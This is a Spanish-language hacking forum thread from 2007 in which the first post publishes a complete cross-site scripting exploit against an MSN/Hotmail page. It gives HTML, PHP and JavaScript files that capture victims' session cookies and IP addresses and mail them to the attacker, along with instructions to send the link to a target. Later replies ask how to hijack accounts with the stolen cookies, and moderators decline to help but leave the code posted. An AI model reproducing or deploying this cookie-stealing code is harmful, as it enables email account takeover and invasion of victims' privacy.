Resultados 1 al 14 de 14

Tema: Grave bug en hotmail

  1. #1 Grave bug en hotmail 
    Medio
    Fecha de ingreso
    Sep 2006
    Ubicación
    S3v1ll4
    Mensajes
    57
    Descargas
    0
    Uploads
    0
    Bueno estoy seguro de que este post será muy visitado jeje, como bien dice el título actualmente existe un gran bug en hotmail, tan grave que con solo pinchar en un enlace tu correo puede ser robado, este bug guarda las cookies de aquel que pinche en un enlace, de forma que son enviadas al correo que eligas(el tuyo vamos) y apartir de ahí facilmente puedes entrar al correo. Por favor si lo copiais no os olvideis la fuente, este bug era privado pero al parecer por un descuido salio a la luz.

    Autor: _Antrax_
    Web: www.c-group.org
    Ya esta aceptado por Milw0rm aunque creo que aun no lo publicaron.

    Exploit php

    Index.php

    Código:
    <html>
    <body>
    <IFRAME SRC="http://www.xxxx.com/ind.php" WIDTH=10 HEIGHT=10>
    <A HREF="ind.php">link</A>
    </IFRAME>
    </body></html>
    ind.php

    Código:
    <?
    $mysite = "http://www.xxxx.com/nice.js"; # <== Edit

    $xpl = "http://moviles.es.msn.com/error.php?error=11&returnurl=%3C/script%3E%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/nice.js%3E%3C/script%3E";
    print '
    <title>ASD</title>
    <body bgcolor="ffffff">
    <center>
    <b></b><br>
    <img src="asd.gif"></center>
    <META HTTP-EQUIV="Refresh" CONTENT="1; URL='.$xpl.'">
    ';
    ?>

    log.php

    Código:
    <?
    $cookie = $_GET['nice'];
    $ip = getenv("REMOTE_ADDR");
    $Time = date("l dS of F Y h:i:s A");

    $msg = "Cookie: $cookie\nIP Address: $ip\Time: $Time";
    $subject = "cookie";
    mail("antrax_sverige@hotmail.com", $subject, $msg);

    header ("location: asd.gif");
    ?>

    nice.js

    Código:
    location.href='http://www.xxxx.com/log.php?nice='+escape(document.cookie)
    reemplazar xxx.com por el sitio donde uno alojo los php ...
    By Dario Struz
    Greetz www.c-group.org Fr34k , penissmen , 4ur3v0ir , S4nt0!, DevilInsideTk , Putus , Inyexion , Bacan , Hanowars ,Chapinhack and Friends.

    PD: Ahí teneís el codigo, simplemente armarlo con vuestros datos, subirlo a un ftp y enviar el enlace a alguien y recibireis es vuestro correo sus cookies.

    Saludos An3urysm_
     

  2. #2 Luego que? 
    Iniciado
    Fecha de ingreso
    Mar 2007
    Mensajes
    1
    Descargas
    0
    Uploads
    0
    Supuestamente obtengo la cookie de la victima pro luego quisiera ke me ayudaras a iniciar sesion con esa cookie obtenida he intentado hacerlo con proxomitron pro no me funciona, espero tu ayuda, gracias
     

  3. #3  
    Medio
    Fecha de ingreso
    Sep 2006
    Ubicación
    S3v1ll4
    Mensajes
    57
    Descargas
    0
    Uploads
    0
    Supuestamente no, el bug funciona te lo puedo asegurar, ya lo he probado y te llegan las cookies de la victima en cuanto ella pinche el enlace que le enviaste(5 min tarda).

    Una vez te llegue usa como bien dijiste el proxomitron, te comento como usarlo por mp.

    Que conste que yo no me dedico a robar correos de nadie, por que lo veo una estupidez, pero eso no significa que no pueda jajaj

    Un saludo
     

  4. #4  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.703
    Descargas
    30
    Uploads
    8
    Cada cual que haga lo que quiera con la info School, ese no es tu problema

    PD: Gran aporte, de nuevo
     

  5. #5  
    Medio
    Fecha de ingreso
    Sep 2006
    Ubicación
    S3v1ll4
    Mensajes
    57
    Descargas
    0
    Uploads
    0
    Bueno s&#243;lo comentaros que este gran agujero de hotmail aun no han sido capaces de solucionarlo, simplemente te sale un cartelito diciendo que puede ser peligroso pinchar en enlaces, etc.
    No me extra&#241;ar&#237;a que haya cambios en hotmail para darle una soluci&#243;n de verdad, sino al tanto.

    Recalco que yo no me dedico a robar correos ni a joder webs ni nada de eso xD, pero creo que la informaci&#243;n debe estar al alcance de todos.

    Saludos
    Última edición por School; 01-04-2007 a las 04:41
     

  6. #6  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.280
    Descargas
    7
    Uploads
    0
    Claro que s&#237;. Si yo tuviese informaci&#243;n m&#225;s o menos importante en una de esas cuentas (que no se dar&#225; el caso) querr&#237;a saber cuanto antes de este tipo de situaciones.

    Gracias por el aporte

    Salu2


    Keep on Rollin'

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
     

  7. #7  
    Avanzado
    Fecha de ingreso
    Sep 2006
    Ubicación
    online
    Mensajes
    789
    Descargas
    5
    Uploads
    0
    no se ninguna pagina web donde subir estos archivos ?. YO tambien quiero probar este bug. Gracias
     

  8. #8  
    Moderador HH
    Fecha de ingreso
    Feb 2002
    Ubicación
    México
    Mensajes
    1.155
    Descargas
    4
    Uploads
    0
    Cita Iniciado por zeratul Ver mensaje
    Supuestamente obtengo la cookie de la victima pro luego quisiera ke me ayudaras a iniciar sesion con esa cookie obtenida he intentado hacerlo con proxomitron pro no me funciona, espero tu ayuda, gracias
    Cita Iniciado por choco1988
    no se ninguna pagina web donde subir estos archivos ?. YO tambien quiero probar este bug. Gracias
    Como ya saben, en este foro no ayudamos a "probar bugs de hotmail" (robar cuentas de correo). La valiosa información que dio School principalmente debe ser para prevenirnos y que no roben nuestros correos.

    Si quieren probar este bug para ver si funciona, ya tienen el exploit y lo demás corre por su propia cuenta y responsabilidad.

    Saludos
    Mientras el mundo permanezca no acabarán la fama y la gloria de México-Tenochtitlan
     

  9. #9  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.703
    Descargas
    30
    Uploads
    8
    Giskard, de nuevo sabias palabras.
    Es como si pides a los de milworm que te expliquen un exploit o te lo den compilao y rulando.
     

  10. #10  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.280
    Descargas
    7
    Uploads
    0
    Que es casi como lo dan, otra cosa es que tambi&#233;n te hagan un programita que te vaya preguntando "&#191;D&#243;nde quieres recibir la info?" o "&#191;Cu&#225;l es la cuenta de la que la quieres?"

    Salu2


    Keep on Rollin'

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
     

  11. #11  
    Avanzado
    Fecha de ingreso
    Sep 2006
    Ubicación
    online
    Mensajes
    789
    Descargas
    5
    Uploads
    0
    Teneis razon chicos perdonad mi pregunta
     

  12. #12  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.280
    Descargas
    7
    Uploads
    0
    Cita Iniciado por chico1988 Ver mensaje
    Teneis razon chicos perdonad mi pregunta
    No necesitas disculparte, lo que ocurre es que este tipo de posts es caldo de cultivo para script kiddies que no respetan la intimidad ajena.

    Salu2


    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
     

  13. #13  
    Colaborador HH
    Fecha de ingreso
    Jun 2006
    Ubicación
    Uruguay
    Mensajes
    1.450
    Descargas
    11
    Uploads
    0
    Pues.. no se si les paresca bien, pero... ya que est&#225; presentado el tema y discutido.
    &#191; Por qu&#233; no cerrarlo ?

    Por suerte todavia no han aparecido esos post que dicen: "me pueden sacar el pass de shashasha@hot... " y cosas as&#237;.

    No se si les parece...

    Saludos,
    Cypress
    Louis Armstrong le dice a Ella Fitzgerald
    "take another drink of wine, and maybe you change your mind"
     

  14. #14  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.703
    Descargas
    30
    Uploads
    8
    Si, mejor cerrado
     

Temas similares

  1. el apagon no es grave
    Por garfield en el foro DIGITAL+
    Respuestas: 69
    Último mensaje: 05-12-2007, 21:11
  2. Fallo grave de taskmgr.exe
    Por Nost en el foro WINDOWS
    Respuestas: 2
    Último mensaje: 02-06-2007, 15:01
  3. Grave vulnerabilidad en Firefox
    Por 4v7n42 en el foro NOTICIAS
    Respuestas: 3
    Último mensaje: 21-02-2007, 18:18
  4. Grave vulnerabilidad en RealVNC
    Por clarinetista en el foro NOTICIAS
    Respuestas: 1
    Último mensaje: 18-05-2006, 20:09

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •